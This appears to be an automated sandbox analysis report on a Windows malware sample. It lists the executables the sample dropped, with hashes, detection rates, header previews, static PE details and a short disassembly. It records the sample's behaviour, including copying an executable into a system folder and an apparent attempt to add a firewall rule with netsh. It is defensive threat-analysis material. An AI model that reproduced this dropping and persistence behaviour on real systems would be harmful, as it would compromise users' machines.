Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 29%, Browse Antivirus: ReversingLabs, Detection: 81%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..U(...(...(...6.).1...6.?.W....l..+...(.......6.8.....6.(.)...6.-.)...Rich(...........PE..L...a.R`.....................v......@.............@..................................&..........................................(........{...................0..........................................@...............8............................text............................... ..`.data...............................@....gizi...............................@....bur................................@....wob................................@....rsrc....{.......\|..................@..@.reloc..4F...0...H...l..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\6B74.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	357376
Entropy (8bit):	7.848837612305308
Encrypted:	false
SSDEEP:	6144:L5aWbksiNTBCxw++TiSUOTtF08P3A6rZluu2PocRzBcByMFkBrBXwNmQp9Un:L5atNTAduU0tFDdlD2PVRzBeyiuFbAGn
MD5:	98E5E0F15766F21E9DCBEEF7DFB6EBB2
SHA1:	921E1B410528FF10A2C3980E35A8F036FF5E40B3
SHA-256:	5C7BF1968002CFFE455B5651C6D650323EA800AD03FA996A9F96CC01028AB093
SHA-512:	E425628E1A6311EBF57F73213DF8CDA9C8B5E888A6054188485614D1910F9E1CD879D5DE1D284CA9754D6405809FBDCC9FEFB72852ACE8E7357A71099800CC42
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2.....^...............0....@.........................................................................lq..........L...........................................................................pt..<............................code...~8.......:.................. ..`.text...B....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......J..............@....rsrc...L............\..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7E61.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	357376
Entropy (8bit):	7.84824059044154
Encrypted:	false
SSDEEP:	6144:b5aWbksiNTBcMOxjwIPHtnAA8R0O+eNpEj9JE/emtUfMtK+e:b5atNTKpxkIPNnT8f+WEj9JETmUKP
MD5:	56610CBDB784A4F8517C5DE4FF92D85E
SHA1:	9A7DC5A26040DC775C1B3854E6909DFD0ADF84FC
SHA-256:	3B6CBB6FDE5051E6EC3AD23789968670C68F3EF82D8FEBE258E223C1487F42C4
SHA-512:	2CA0753458611C7DC5BFAAE0BA2947E001E6D2E3BD8A4FB447B075D755BFA0566AEA4FCCCC5C97FAE4149CF1A439922B4B14EE4D39B7DF0B26F775FD3F6C8C92
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2.....^...............0....@.........................................................................lq..........D...........................................................................pt..<............................code...~8.......:.................. ..`.text...B....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......J..............@....rsrc...D............\..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\9054.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3570176
Entropy (8bit):	7.997630766149595
Encrypted:	true
SSDEEP:	98304:Eyu1PF0IdV1/b4gfya9kofb/4rosp08oUPQH:EjtFp/tfyOTQrosGrUP0
MD5:	DDC599DB99362A7D8642FC19ABE03871
SHA1:	11199134356D8DE145D2EE22AAC37CA8AABA8A0B
SHA-256:	5D94F66FD3315E847213E16E19DFEB008B020798CFFF1334D48AC3344B711F22
SHA-512:	E35DBE56828E804AA78FE436E1717C3A09C416DBE2873FFFC9B44393E7EC2336CE9C544E4D6011C58E7E706819AEABC027AF9A85AA2A2509BDFC39699560ABFD
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O.a.................$...................@....@.......................... T.....b.6.....................................\|lO. .....M...................................................................................................................... ..........................@................0......................@...........&....@......................@................0......................@............1...P......................@............02......./.................@....rsrc.........M......40.............@....T3QbYgM.....`O.......1.............@....adata........T......z6.............@...........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\952.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	313344
Entropy (8bit):	5.385503417493937
Encrypted:	false
SSDEEP:	3072:ODhRp6LR3B/X3Q36+cErZGXrVfAEiphvXRltMMkNkVggjcGkNIVqI:ODhRMRvAzjZGXhfAEivBV7ITsq
MD5:	4C29CFD658E015FA4DB5A2454F103D4A
SHA1:	8F6446343C0EEC5AD7F78F359BFE3CB1774974E6
SHA-256:	52E5252201061F6D1FF2EA00B5DC59A8B0F85FBA7E5F3EF7B3187717431E2DC5
SHA-512:	F611459A65EF60B4FDFE82BFD30EADC53F3122DE0EF00377C7208441C9B9DC001DAD9F5C16E0F12578EF4D2695433F93D4921254F425FE9F52B64F79E6A139AC
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,?a.Bla.Bla.Bl._.l\|.Bl._.l..Bl._.lO.BlF.9lb.Bla.Cl..Bl._.l`.Bl._.l`.Bl._.l`.BlRicha.Bl........................PE..L...(6._................. ...".......2.......0....@..........................@......r7..........................................(....`...............................1...............................r..@............0...............................text............ .................. ..`.rdata...X...0...Z...$..............@..@.data............l...~..............@....rsrc........`......................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\B1F6.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3558912
Entropy (8bit):	7.997469140425603
Encrypted:	true
SSDEEP:	98304:yzzKY1eh2yDYShw4LnKd4yYcr8tEY8fhV1T:yzW52yw4rZy3rOEvhv
MD5:	DB3711D2DE8511E1192E6E38988E6989
SHA1:	D33A20FDC9D6E08BB66E355DA3B9B9219E459DDB
SHA-256:	0D5636B8B6C3F9876A0CA4741F8FA704366DDABA6FA65C5BB5740616F8985927
SHA-512:	32ADE75117319A5CB139BA83277F3F5007289A6559BDDC78D1417C7F20219D11F0668AE3743A7B8142562C43170D22CD85C8440D88F1C8509A414234DEFEB76F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O.a.................$...................@....@...........................S......G6.....................................\|.N. ....@M...................................................................................................................... ..........................@................0......................@...........&....@......................@................0......................@...........~....P......................@.............1..p......................@....rsrc........@M......./.............@....MYBFBZj......N.......1.............@....adata........S......N6.............@...........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\CA61.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	905216
Entropy (8bit):	7.399713113456654
Encrypted:	false
SSDEEP:	12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
MD5:	852D86F5BC34BF4AF7FA89C60569DF13
SHA1:	C961CCD088A7D928613B6DF900814789694BE0AE
SHA-256:	2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
SHA-512:	B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P\|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\FD2B.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	327168
Entropy (8bit):	5.544004911166714
Encrypted:	false
SSDEEP:	3072:kApM+Wvghk1X3Qvg6+3lpIWnTPCl1Jw62s1pILewTywVggjcGkNIVqI:kApE4kxAvU3lpIWql3Ewkewv7ITsq
MD5:	CEBAF005081C730D4AC7A87E46B440D0
SHA1:	70C9FDA14D6F9B578E795B6FCD015629BA6FBFF5
SHA-256:	4F5A438F45CD46F639F813063DCA15C0D7A6F77BCB5DF788AE8B761A96AE25F5
SHA-512:	E398988945BC2D75D53A822FD482B16C9E780E64620F2663B85F6D9F4076A9397FFBA7EFA7A205A13CD33B77356002BA34F88FA30175241E98F05E7582598410
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,?a.Bla.Bla.Bl._.l\|.Bl._.l..Bl._.lO.BlF.9lb.Bla.Cl..Bl._.l`.Bl._.l`.Bl._.l`.BlRicha.Bl........................PE..L....._................. ...Z.......2.......0....@.................................i...........................................(....................................1...............................r..@............0...............................text............ .................. ..`.rdata..xX...0...Z...$..............@..@.data...x............~..............@....rsrc................ ..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\vodibdaj.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\952.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13043712
Entropy (8bit):	6.366947693071425
Encrypted:	false
SSDEEP:	12288:lDhWRvAkYLv7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7QD:loRvA7
MD5:	E331BE085840751FF0AC8DCBCDC5F5E3
SHA1:	131F8E057EB9476CC73080E76BB845A06EDC0964
SHA-256:	520F8BC540C90AF4B21118E2DAFC63878C84C685B2CF8682B94D52E7FA492796
SHA-512:	D33ACFD2E4859615CC2AA383E598B58426940AFD0795AB8B14A34F4C7EE3BCD154E5975D294397D30AB588228F5C04348F53362F3CA51D0FB6CBB7A717CFE293
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,?a.Bla.Bla.Bl._.l\|.Bl._.l..Bl._.lO.BlF.9lb.Bla.Cl..Bl._.l`.Bl._.l`.Bl._.l`.BlRicha.Bl........................PE..L...(6._................. ...".......2.......0....@..........................@......r7..........................................(....`...............................1...............................r..@............0...............................text............ .................. ..`.rdata...X...0...Z...$..............@..@.data............l...~..............@....rsrc........`......................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\tiftjuh Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	283648
Entropy (8bit):	5.09190119944441
Encrypted:	false
SSDEEP:	3072:AQAT6lATyGd4pXqYMER3QLSeuYerXcyGmofWrxpzbgqru:AQppHZQLSeNcbG/fuzbgwu
MD5:	A7444553F8A8FE2702B6FD48008D6605
SHA1:	F6D3D6CCF728AE7AB39B7E29F21AE5BCC7FCE98B
SHA-256:	BA5303301925A877689B30EFC36F872564F06906B2A61D7C3A7C955B0587D4F8
SHA-512:	28A1EDB043AE30AF213CBFE93745F2D94A4F9F5B76668CBED0889780DC7031E4A6D1CAA839D78035A42769BC13D2D0A376E13E50779807EDBCD3189D44F070BF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L.....?_................. ...........0.......0....@.................................,Q......................................hf..(....... ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata..2?...0...@...$..............@..@.data........p..."...d..............@....rsrc... ...........................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\tiftjuh:Zone.Identifier Download File
Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20220114_044950_709.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	3.386072904720816
Encrypted:	false
SSDEEP:	96:3TCA2po+EP5IT9s2Y7FCHSI2lQJvkzM4zOT2AYFz/UMCprJRpl5N:WZ5rjh2WZOCrh
MD5:	36C1E8F3408F5AB482AB271BEA1CE1FD
SHA1:	383C14C76CA0057C0CD4CFF0E2C5F373D2D7E6D5
SHA-256:	34E2ACEBF493AB5EF65D665DFF258A649B57FACEAAF558017A11DDCD8A5BA935
SHA-512:	70DA15A77F2C3F1AD7BE7EDAD3197FE5D38D5D7BD1EBF8763ED2EEBEA3D29F7B1FF9423B8A79BA2E1DD679506CE69BA2536AD8E4D2B715C1E72A446812551663
Malicious:	false
Reputation:	unknown
Preview:	.... ... ....................................... ...!...........................8................................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................./_8..... .....%(.*............8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.2.0.1.1.4._.0.4.4.9.5.0._.7.0.9...e.t.l.........P.P.8...............................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\bhlprady\vodibdaj.exe (copy) Download File
Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13043712
Entropy (8bit):	6.366947693071425
Encrypted:	false
SSDEEP:	12288:lDhWRvAkYLv7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7Q7QD:loRvA7
MD5:	E331BE085840751FF0AC8DCBCDC5F5E3
SHA1:	131F8E057EB9476CC73080E76BB845A06EDC0964
SHA-256:	520F8BC540C90AF4B21118E2DAFC63878C84C685B2CF8682B94D52E7FA492796
SHA-512:	D33ACFD2E4859615CC2AA383E598B58426940AFD0795AB8B14A34F4C7EE3BCD154E5975D294397D30AB588228F5C04348F53362F3CA51D0FB6CBB7A717CFE293
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,?a.Bla.Bla.Bl._.l\|.Bl._.l..Bl._.lO.BlF.9lb.Bla.Cl..Bl._.l`.Bl._.l`.Bl._.l`.BlRicha.Bl........................PE..L...(6._................. ...".......2.......0....@..........................@......r7..........................................(....`...............................1...............................r..@............0...............................text............ .................. ..`.rdata...X...0...Z...$..............@..@.data............l...~..............@....rsrc........`......................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\IdentityCRL\production\tmpconfig.xml Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	12703
Entropy (8bit):	5.664727316652114
Encrypted:	false
SSDEEP:	192:Tu8vk5/2HBw1tY3LZC7URIwKZ1bSvHSm5128Zil7Or5QwhJlAi:Tu8+2xZJRIwKZzm5yKFX
MD5:	0516512FF97C0F1DF67ED56A848B02A9
SHA1:	F50B8012260B8085EE1F350F78D8F3D24FB4F5EF
SHA-256:	41BE64D933BE2102AB9651C6478959EDB3763A7AA7B32E4E086150F7F13CE7A0
SHA-512:	CE06CA9414EF56987D45D43253DA96B53074BFED48DC4383AAF8EFC78CC3EEF2B982738CC7AEF9E3F750A2F55EF14EEED3F077026ADDC07C4D01D36BFB3A767C
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="us-ascii"?><Signature xmlns="http://www.w3.org/2000/09/xmldsig#"><cfg:Configuration version="1.1" xmlns:cfg="http://schemas.microsoft.com/Passport/PPCRL"> .. When a certificate is rev'd, a line like the following should be .. added to the cfg:Settings section:.. <cfg:Certificate expired="true">SLCA_BACKUP.CER</cfg:Certificate>.. --><cfg:Settings><cfg:DeviceDNSSuffix>.devicedns.live.com</cfg:DeviceDNSSuffix><cfg:ResolveTimeout>120000</cfg:ResolveTimeout><cfg:ConnectTimeout>60000</cfg:ConnectTimeout><cfg:SendTimeout>30000</cfg:SendTimeout><cfg:ReceiveTimeout>30000</cfg:ReceiveTimeout><cfg:MinMinutesBetweenMetaConfigCheck>1440</cfg:MinMinutesBetweenMetaConfigCheck><cfg:ConfigServerSslURI>https://go.microsoft.com/fwlink/?LinkId=859524</cfg:ConfigServerSslURI><cfg:DIDCOMMetaData><cfg:DIDWithAuth>1</cfg:DIDWithAuth><cfg:AssocPDIDToLDID>1</cfg:AssocPDIDToLDID><cfg:Protocol><cfg:CLSID>{1C109E4C-2F30-4EA3-A57A-A290877A2303}</cfg:CLSID><cfg:DATA

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.261542646947877
Encrypted:	false
SSDEEP:	12288:WDry9CsWH6WqxQJKo3pscOBnAykoTjuWKSZ/J4F2U5+DWu4UTKDFmkM9:Wry9CsWH6WqxQJKV5DZ9
MD5:	9DD1B2C13E54BFBDDC233A2107B3AFA1
SHA1:	19F44BC959620448A9E8E45198902EB667D3F0FF
SHA-256:	D91CC5B510FF718D8CED59A261914ABEB72B96FB40418949E6B1DF993BB949BE
SHA-512:	91B5CDDA3FF1363663AB4B897869EF1C39FD8F722048887CEB7AA513C05AB6DD7183EDC72E4B3FE63B0C4140C4D2AEE0B2C9DC5CBA3EAC9C40E6913FF23940AD
Malicious:	false
Reputation:	unknown
Preview:	regfQ...Q...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm"."A................................................................................................................................................................................................................................................................................................................................................`').........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	3.7809311639586114
Encrypted:	false
SSDEEP:	384:co65rZrdFdXp5xQp8JXQnxOf2oLPmxwpe5GjZmGudDTTVv5N5/sTCef:vk1rFXp4pHgf2oqxwpCWmGutTVRN5gCe
MD5:	28554A0C6B33D9BF5BA5149FFD57ED28
SHA1:	D61C244F3A5C9FF4891DF70831A455ADE9ADFF6C
SHA-256:	2933C4D27D58B26EA5F4662F16E54A62CC44CD39CBC0D40B86168E97E35345B7
SHA-512:	E7A739F019DC7EADCD94676324AB1B9FE76D75EDAABFE6785A97F23FA35DA8653103C2E77D20EE0FC07DE38668EE291A3DBB6C50412804F5F16F70B6F3C29E5A
Malicious:	false
Reputation:	unknown
Preview:	regfP...P...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm"."A................................................................................................................................................................................................................................................................................................................................................f').HvLE.^......P...........~h>....L+................................ ..hbin................p.\..,..........nk,...$A.................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ...$A........ ...........P............... .......Z.......................Root........lf......Root....nk ...$A.....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...

\Device\ConDrv Download File
Process:	C:\Windows\SysWOW64\netsh.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3773
Entropy (8bit):	4.7109073551842435
Encrypted:	false
SSDEEP:	48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
MD5:	DA3247A302D70819F10BCEEBAF400503
SHA1:	2857AA198EE76C86FC929CC3388A56D5FD051844
SHA-256:	5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
SHA-512:	48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
Malicious:	false
Reputation:	unknown
Preview:	..A specified value is not valid.....Usage: add rule name=<string>.. dir=in\|out.. action=allow\|block\|bypass.. [program=<program path>].. [service=<service short name>\|any].. [description=<string>].. [enable=yes\|no (default=yes)].. [profile=public\|private\|domain\|any[,...]].. [localip=any\|<IPv4 address>\|<IPv6 address>\|<subnet>\|<range>\|<list>].. [remoteip=any\|localsubnet\|dns\|dhcp\|wins\|defaultgateway\|.. <IPv4 address>\|<IPv6 address>\|<subnet>\|<range>\|<list>].. [localport=0-65535\|<port range>[,...]\|RPC\|RPC-EPMap\|IPHTTPS\|any (default=any)].. [remoteport=0-65535\|<port range>[,...]\|any (default=any)].. [protocol=0-255\|icmpv4\|icmpv6\|icmpv4:type,code\|icmpv6:type,code\|.. tcp\|udp\|any (default=any)].. [interfacetype=wireless\|lan\|ras\|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes\|deferapp\|deferuser\|no (default=no)].. [security=authenticate\|authenc\|authdynenc\|authnoencap\|

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.09190119944441
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	emPJndhuvA.exe
File size:	283648
MD5:	a7444553f8a8fe2702b6fd48008d6605
SHA1:	f6d3d6ccf728ae7ab39b7e29f21ae5bcc7fce98b
SHA256:	ba5303301925a877689b30efc36f872564f06906b2a61d7c3a7c955b0587d4f8
SHA512:	28a1edb043ae30af213cbfe93745f2d94a4f9f5b76668cbed0889780dc7031e4a6d1caa839d78035a42769bc13d2d0a376e13e50779807edbcd3189d44f070bf
SSDEEP:	3072:AQAT6lATyGd4pXqYMER3QLSeuYerXcyGmofWrxpzbgqru:AQppHZQLSeNcbG/fuzbgwu
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................g.......q.I.....v......h..........E.....x.......f.......c.....Rich....................PE..L.....?_...........

File Icon


Icon Hash:	acfc36b6b69cc6e2

Static PE Info

General
Entrypoint:	0x403000
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x5F3F8DFF [Fri Aug 21 09:03:59 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	6d4af36ccbaddaffd179ef41d42df9cf

Entrypoint Preview

Instruction
call 00007F8AAC72C447h
jmp 00007F8AAC7263FDh
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
test ecx, 00000003h
je 00007F8AAC7265A6h
mov al, byte ptr [ecx]
add ecx, 01h
test al, al
je 00007F8AAC7265D0h
test ecx, 00000003h
jne 00007F8AAC726571h
add eax, 00000000h
lea esp, dword ptr [esp+00000000h]
lea esp, dword ptr [esp+00000000h]
mov eax, dword ptr [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, FFFFFFFFh
xor eax, edx
add ecx, 04h
test eax, 81010100h
je 00007F8AAC72656Ah
mov eax, dword ptr [ecx-04h]
test al, al
je 00007F8AAC7265B4h
test ah, ah
je 00007F8AAC7265A6h
test eax, 00FF0000h
je 00007F8AAC726595h
test eax, FF000000h
je 00007F8AAC726584h
jmp 00007F8AAC72654Fh
lea eax, dword ptr [ecx-01h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-02h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-03h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-04h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 004132D8h
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax
je 00007F8AAC72658Eh
test byte ptr [eax], 00000008h

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[LNK] VS2008 build 21022
[ASM] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[C++] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x16668	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x40000	0xcd20	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x131d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x15940	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x13000	0x188	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x11e13	0x12000	False	0.607245551215	data	6.66808697674	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x13000	0x3f32	0x4000	False	0.365783691406	data	5.41084156967	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
